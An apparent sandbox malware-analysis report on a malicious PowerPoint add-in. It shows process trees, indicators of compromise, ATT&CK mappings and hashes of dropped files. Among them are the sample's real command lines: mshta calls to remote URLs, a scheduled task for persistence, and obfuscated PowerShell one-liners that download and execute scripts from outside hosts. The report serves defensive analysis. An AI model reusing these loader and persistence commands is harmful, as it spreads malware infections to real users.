896	powershell.exe
1972	powershell.exe
1700	powershell.exe
1972	powershell.exe
1700	powershell.exe
896	powershell.exe
2032	powershell.exe
2032	powershell.exe
1332	powershell.exe
1332	powershell.exe
800	powershell.exe
800	powershell.exe
1292	powershell.exe
1292	powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

Processes:

OUTLOOK.EXEpowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	768	OUTLOOK.EXE
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	896	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	2032	powershell.exe
Token: SeDebugPrivilege	1332	powershell.exe
Token: SeDebugPrivilege	800	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe

Suspicious use of FindShellTrayWindow 7 IoCs

Processes:

OUTLOOK.EXEPOWERPNT.EXE

pid process

768 OUTLOOK.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
1028 POWERPNT.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
Suspicious use of SendNotifyMessage 5 IoCs

Processes:

OUTLOOK.EXE

pid process

768 OUTLOOK.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
768 OUTLOOK.EXE
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

OUTLOOK.EXE

pid process

768 OUTLOOK.EXE

pid	process
768	OUTLOOK.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE
1028	POWERPNT.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE

pid	process
768	OUTLOOK.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE
768	OUTLOOK.EXE

pid	process
768	OUTLOOK.EXE

Suspicious use of WriteProcessMemory 56 IoCs

Processes:

POWERPNT.EXEOUTLOOK.EXEmshta.exepowershell.exepowershell.exeWScript.exepowershell.exeWScript.exepowershell.exeWScript.exe

description	pid	process	target process
PID 1028 wrote to memory of 832	1028	POWERPNT.EXE	splwow64.exe
PID 1028 wrote to memory of 832	1028	POWERPNT.EXE	splwow64.exe
PID 1028 wrote to memory of 832	1028	POWERPNT.EXE	splwow64.exe
PID 1028 wrote to memory of 832	1028	POWERPNT.EXE	splwow64.exe
PID 768 wrote to memory of 260	768	OUTLOOK.EXE	mshta.exe
PID 768 wrote to memory of 260	768	OUTLOOK.EXE	mshta.exe
PID 768 wrote to memory of 260	768	OUTLOOK.EXE	mshta.exe
PID 768 wrote to memory of 260	768	OUTLOOK.EXE	mshta.exe
PID 260 wrote to memory of 1700	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1700	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1700	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1700	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1972	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1972	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1972	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 1972	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 896	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 896	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 896	260	mshta.exe	powershell.exe
PID 260 wrote to memory of 896	260	mshta.exe	powershell.exe
PID 1700 wrote to memory of 520	1700	powershell.exe	schtasks.exe
PID 1700 wrote to memory of 520	1700	powershell.exe	schtasks.exe
PID 1700 wrote to memory of 520	1700	powershell.exe	schtasks.exe
PID 1700 wrote to memory of 520	1700	powershell.exe	schtasks.exe
PID 896 wrote to memory of 1888	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 1888	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 1888	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 1888	896	powershell.exe	WScript.exe
PID 1888 wrote to memory of 2032	1888	WScript.exe	powershell.exe
PID 1888 wrote to memory of 2032	1888	WScript.exe	powershell.exe
PID 1888 wrote to memory of 2032	1888	WScript.exe	powershell.exe
PID 1888 wrote to memory of 2032	1888	WScript.exe	powershell.exe
PID 2032 wrote to memory of 1364	2032	powershell.exe	WScript.exe
PID 2032 wrote to memory of 1364	2032	powershell.exe	WScript.exe
PID 2032 wrote to memory of 1364	2032	powershell.exe	WScript.exe
PID 2032 wrote to memory of 1364	2032	powershell.exe	WScript.exe
PID 1364 wrote to memory of 1332	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 1332	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 1332	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 1332	1364	WScript.exe	powershell.exe
PID 1332 wrote to memory of 1900	1332	powershell.exe	Dism.exe
PID 1332 wrote to memory of 1900	1332	powershell.exe	Dism.exe
PID 1332 wrote to memory of 1900	1332	powershell.exe	Dism.exe
PID 1332 wrote to memory of 1900	1332	powershell.exe	Dism.exe
PID 1364 wrote to memory of 800	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 800	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 800	1364	WScript.exe	powershell.exe
PID 1364 wrote to memory of 800	1364	WScript.exe	powershell.exe
PID 896 wrote to memory of 980	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 980	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 980	896	powershell.exe	WScript.exe
PID 896 wrote to memory of 980	896	powershell.exe	WScript.exe
PID 980 wrote to memory of 1292	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1292	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1292	980	WScript.exe	powershell.exe
PID 980 wrote to memory of 1292	980	WScript.exe	powershell.exe

C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\13,pdf.ppam"
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1028

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:832

C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:768

C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" https://www.bitly.com/ddwddgwfwowkooooi
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:260

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /create /sc MINUTE /mo 80 /tn ""BlueStacksIUptad"" /F /tr ""\""MsHtA http://1230948%1230948@bukbukbukak.blogspot.com/p/14.html\""
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1700

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /sc MINUTE /mo 80 /tn BlueStacksIUptad /F /tr "MsHtA http://1230948%1230948@bukbukbukak.blogspot.com/p/14.html"
4⤵
- Creates scheduled task(s)
PID:520

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_e13301e584364fc3bff26811d57abff6.txt').GetResponse().GetResponseStream()).ReadToend());I`E`X([System.IO.StreamReader]::new( [System.Net.WebRequest]::Create('https://92c49223-b37f-4157-904d-daf4679f14d5.usrfiles.com/ugd/92c492_fe127b23fca84ea484500ff2e8b1e13b.txt').GetResponse().GetResponseStream()).ReadToend());
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $NOTHING = '(N`e`<^_^>t`.W`e'.Replace('<^_^>','w-Object Ne');$alosh='bC||||||!@!@nlo'.Replace('||||||!@!@','lient).Dow'); $Dont='adString(''https://35d42729-3b2d-44cd-88c7-59a76492301c.usrfiles.com/ugd/35d427_aba34aefaf6944578eaddcbf518b0d51.txt'')';$YOUTUBE=I`E`X ($NOTHING,$alosh,$Dont -Join '')|I`E`X
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:896

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\Chrome.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\run.ps1
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2032

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Public\vb.vbs"
6⤵
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\test.ps1
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1332

C:\Windows\SysWOW64\Dism.exe
"C:\Windows\system32\Dism.exe" /online /enable-feature /featurename:NetFX3
8⤵
- Drops file in Windows directory
PID:1900

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\alosh.ps1
7⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:800

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:980

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nologo -ExecutionPolicy Unrestricted -File C:\Users\Public\msi.ps1
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1292

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Install Root Certificate

T1130

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
MD5
2902de11e30dcc620b184e3bb0f0c1cb

SHA1
5d11d14a2558801a2688dc2d6dfad39ac294f222

SHA256
e6a7f1f8810e46a736e80ee5ac6187690f28f4d5d35d130d410e20084b2c1544

SHA512
efd415cde25b827ac2a7ca4d6486ce3a43cdcc1c31d3a94fd7944681aa3e83a4966625bf2e6770581c4b59d05e35ff9318d9adaddade9070f131076892af2fa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
90cdd054173a680923cbaed38341fd4e

SHA1
d7424d7168b6e3227a1705627ec150a9abd012ca

SHA256
7dcd6b09b2dd5fdc2941d746238b065daf732dd1be740cf289c6ffd144511b00

SHA512
d25c8816eee71ddde7ede577e40d596bb2a931a6d83409481cdc6ead25f88d3dbfd727c9c2cac4e6c5ff282a9312215392b9e98f7284f63315c491d30ecd67ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_10a2719f-ab19-452c-9537-375fecbe5f96
MD5
df44874327d79bd75e4264cb8dc01811

SHA1
1396b06debed65ea93c24998d244edebd3c0209d

SHA256
55de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181

SHA512
95dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1abda922-9e0e-4200-89d0-60796083afcc
MD5
be4d72095faf84233ac17b94744f7084

SHA1
cc78ce5b9c57573bd214a8f423ee622b00ebb1ec

SHA256
b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc

SHA512
43856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_32b21970-4839-4ac5-a2ad-cc925aecc47c
MD5
a725bb9fafcf91f3c6b7861a2bde6db2

SHA1
8bb5b83f3cc37ff1e5ea4f02acae38e72364c114

SHA256
51651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431

SHA512
1c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_38976084-09ec-4b1e-a281-2315df8d51c5
MD5
7f79b990cb5ed648f9e583fe35527aa7

SHA1
71b177b48c8bd745ef02c2affad79ca222da7c33

SHA256
080ec69d3f2abac629a0bdc314f150ad42a9a1b0a031b1d5c7b5b80051c48683

SHA512
20926edf7f0b990da4bd8d7ba91bd8bf7b952b75080f687afa7197a91777604688303d38b4a0a7240b558c23f2e0cd927d3590765109f8be0551f5eb050eafda

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_60554f64-a36e-4439-8748-76f202d7cb75
MD5
02ff38ac870de39782aeee04d7b48231

SHA1
0390d39fa216c9b0ecdb38238304e518fb2b5095

SHA256
fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876

SHA512
24a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6ccb18ff-7a22-469e-90e7-ccc861e1432b
MD5
b6d38f250ccc9003dd70efd3b778117f

SHA1
d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a

SHA256
4de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265

SHA512
67d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7bc5ca8a-50eb-4a28-856a-31595e01418a
MD5
597009ea0430a463753e0f5b1d1a249e

SHA1
4e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62

SHA256
3fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d

SHA512
5d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_89af2331-eee3-4f57-8236-069b9a5c424d
MD5
a70ee38af4bb2b5ed3eeb7cbd1a12fa3

SHA1
81dbaeae4b0f9e1adc0a1e3d6d76a12396498ba9

SHA256
dd2f41f92f19c3fe031bdf5da68ab06768e26762d0077b290cd0094df1d5d58d

SHA512
8c69a5300c7545c5c4b25a0594e6813b6b7a85b5f3ae7fc5464b4074fe6f50b2f49d31cacf19bc20a02bb8e237656f1b9b2a3f6a3953e3a8478ca2adc154e0e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd47eb21-a96b-4ccd-99d7-0d9f3f6c10b6
MD5
75a8da7754349b38d64c87c938545b1b

SHA1
5c28c257d51f1c1587e29164cc03ea880c21b417

SHA256
bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96

SHA512
798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bd6c96f2-d918-4ef9-9774-d87e320735a9
MD5
354b8209f647a42e2ce36d8cf326cc92

SHA1
98c3117f797df69935f8b09fc9e95accfe3d8346

SHA256
feae405d288fdd38438f9d9b54f791f3ce3805f1bb88780da5aca402ad372239

SHA512
420be869b58e9a7a2c31f2550ac269df832935692a6431d455a10d9b426781e79d91e30ace2c465633b8a7ff2be1bf49734d8b99a390090dc4b36411d4391ff0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c9b427a0-6073-4eb8-9b09-f8e4712d7ab5
MD5
5e3c7184a75d42dda1a83606a45001d8

SHA1
94ca15637721d88f30eb4b6220b805c5be0360ed

SHA256
8278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59

SHA512
fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fdf876e3-c297-4a4e-952b-808e92722cba
MD5
d89968acfbd0cd60b51df04860d99896

SHA1
b3c29916ccb81ce98f95bbf3aa8a73de16298b29

SHA256
1020cc7c929cd5a4e68ccb40353ca76f427df363f0d95e456eb79db039bdb2b9

SHA512
b0e886cce598371b59131fed1535e220c798691bad93ef9474ba440066f5a6bd77a60966604b7a5ff6298b2e200c9dd0c8f9f04aff208b2af423480ead4e8842

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
MD5
d30cac130a02a4ac3b673beab01ab5ba

SHA1
507bfebe123234af438c0b131ae14c0ac4104efe

SHA256
330883dc5e1823ca08db0501a0219bf8eb42450503d8d7d86a2252fa4dada10a

SHA512
aadb969600ad08b2c9c9941abcb5d99e24e75efcb9d81989da8949a684a94af5570e24333264bf4216ee83e9a6e8d65c0a0730e0dcf4e71a68566ef48d88bee7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
fbacfcd9baccdf605784b5742526d5df

SHA1
a662a94dc739ec8f82c42a04578550461f43e150

SHA256
d7e921ae84b8b0c9294a99b22f778035cb4c1a0eb9f178b9980d1c553b20911c

SHA512
1c62d3a7a5780a62d0691552043a2ee0d8bea5f3c60f3f147cf24d6b95e331c70b1986a9238e3c727b297e7517c2afd01a532bfc2c7cd65d979acb7b1f99c5f4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OneDrive.vbs
MD5
f945034d10bd8bf48dcc2bfc69073fba

SHA1
9a23dd5a72478fa3cd59b8d1990085f771ae6257

SHA256
61e40c1da7fd6964108819d35ac2641ec11f80d18f81b3fdc361612e6060bf8c

SHA512
6dda877f95215b53afb62c45fa224a35fe9737aa5cd077b848c35ad2d222e171dd8c9ed6455d77466c0cbf6e08e8bd379d02922c2ae63b14c04d93e00839690e

Download Submit
C:\Users\Public\Chrome.vbs
MD5
21f92edee2af4bc216319db004fbdaa1

SHA1
8fc7189f67b102fb5597f85eaad8e19f46072cc2

SHA256
febb4719018181cf1dc5ed66812439e8c0a8b982a18c2e77354986804b71c1fa

SHA512
daf6465129ae4025d970dad45ed84a253b8128552401f61a65bee3185805468abbe8d0ce4f013f11da5d5b81ff012e9de010348a0b510b9b503a5387365ae8d5

Download Submit
C:\Users\Public\alosh.ps1
MD5
199afc572f448386b8a72f872b64778c

SHA1
012a4e164be0c2b67a58b149e8a4ae48b929e323

SHA256
049d229c448e844e1e6d7e30478d986f549c05471764db32ee349f494c3e1314

SHA512
c629da224eb62aa4654a5491b759b176ff940732259e1490e9f19c702307710180988f369fe4124824d20ed20f7e220a887f94d8312135a3fcb36b7a2244ac4e

Download Submit
C:\Users\Public\msi.ps1
MD5
7456544bedffeca70a71cfa4db520477

SHA1
0ea8327a0e74bca75fb046107cb9567fc9cb5b95

SHA256
1a388a4dfa02843333a44b3722023a7a927ffd528613066a96890d05764ec402

SHA512
030f104eabe534b0f97b1f87427fdf2ae6b2fae817bcb14663ec19617b8cf113d0d515f2b8a1c80347616f00ef85ed8952eaa16a19cdd86ab3f8d29a3bf427cb

Download Submit
C:\Users\Public\run.ps1
MD5
63bd7cfab54d73ab1f873d14630c13f5

SHA1
5a0e987f8e6b896d3aaf7f3cd4111a839728fa27

SHA256
76e20cb044db745f7065bff4d5bb09c16d83ca1d17f615fa2e41e1d68f1cde17

SHA512
756ebf8d84069d1907bfe4e01c6157c2accb9016a237d329b17c89fed5e4d34304eb615352b346dc033a0a6c5ac5f464774d3166adad5f94077d00fadabf712d

Download Submit
C:\Users\Public\test.ps1
MD5
0b119324fe20165418a281ffdd2849f9

SHA1
f46a138515f4475f7d86506e91c1748d4e2898af

SHA256
7993a1c616e7d70074f3508ee8fb3d5b709f2a6894cd5a3fceff1630503a6513

SHA512
149aca50f20aacc08e1907e55bd32494280d7db39ac7367c5567b217c93c2872ac979994569f7bf4a047d5ec42b6724a46da7036dae1aeb6b5b8e9b1bb75e17b

Download Submit
C:\Users\Public\vb.vbs
MD5
9f2515682a9f34a68bfe247947b4f9db

SHA1
7141c3f4a29998c7665d1e5ccef316e11f0204e9

SHA256
03b7e264915f482ca3499e842e8e71a2186c67f067adbd222059302da7b320f7

SHA512
378f95e480bfa9fa0350b671cba08d9ab94231bba330a71215a6f2084b2126c5f7ffac132692e54c5c0d77a9af45188c69aa75b9bda72ae3d6ff03d1bc9a8582

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/260-69-0x0000000000000000-mapping.dmp

Download
memory/520-98-0x0000000000000000-mapping.dmp

Download
memory/800-177-0x0000000000000000-mapping.dmp

Download
memory/800-183-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/800-184-0x0000000004932000-0x0000000004933000-memory.dmp

Filesize
4KB

Download
memory/832-63-0x0000000000000000-mapping.dmp

Download
memory/832-64-0x000007FEFBD61000-0x000007FEFBD63000-memory.dmp

Filesize
8KB

Download
memory/896-134-0x00000000066D0000-0x00000000066D1000-memory.dmp

Filesize
4KB

Download
memory/896-118-0x00000000063A0000-0x00000000063A1000-memory.dmp

Filesize
4KB

Download
memory/896-103-0x0000000005750000-0x0000000005751000-memory.dmp

Filesize
4KB

Download
memory/896-89-0x00000000048C2000-0x00000000048C3000-memory.dmp

Filesize
4KB

Download
memory/896-95-0x0000000005300000-0x0000000005301000-memory.dmp

Filesize
4KB

Download
memory/896-133-0x0000000006680000-0x0000000006681000-memory.dmp

Filesize
4KB

Download
memory/896-108-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/896-80-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/896-77-0x0000000000000000-mapping.dmp

Download
memory/896-119-0x00000000064B0000-0x00000000064B1000-memory.dmp

Filesize
4KB

Download
memory/896-83-0x0000000004900000-0x0000000004901000-memory.dmp

Filesize
4KB

Download
memory/896-92-0x0000000002600000-0x0000000002601000-memory.dmp

Filesize
4KB

Download
memory/896-109-0x00000000062F0000-0x00000000062F1000-memory.dmp

Filesize
4KB

Download
memory/896-88-0x00000000048C0000-0x00000000048C1000-memory.dmp

Filesize
4KB

Download
memory/896-116-0x0000000006380000-0x0000000006381000-memory.dmp

Filesize
4KB

Download
memory/896-117-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/980-187-0x0000000000000000-mapping.dmp

Download
memory/1028-66-0x00000000057C0000-0x00000000057C2000-memory.dmp

Filesize
8KB

Download
memory/1028-65-0x0000000075801000-0x0000000075803000-memory.dmp

Filesize
8KB

Download
memory/1028-60-0x0000000073EC1000-0x0000000073EC5000-memory.dmp

Filesize
16KB

Download
memory/1028-70-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1028-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
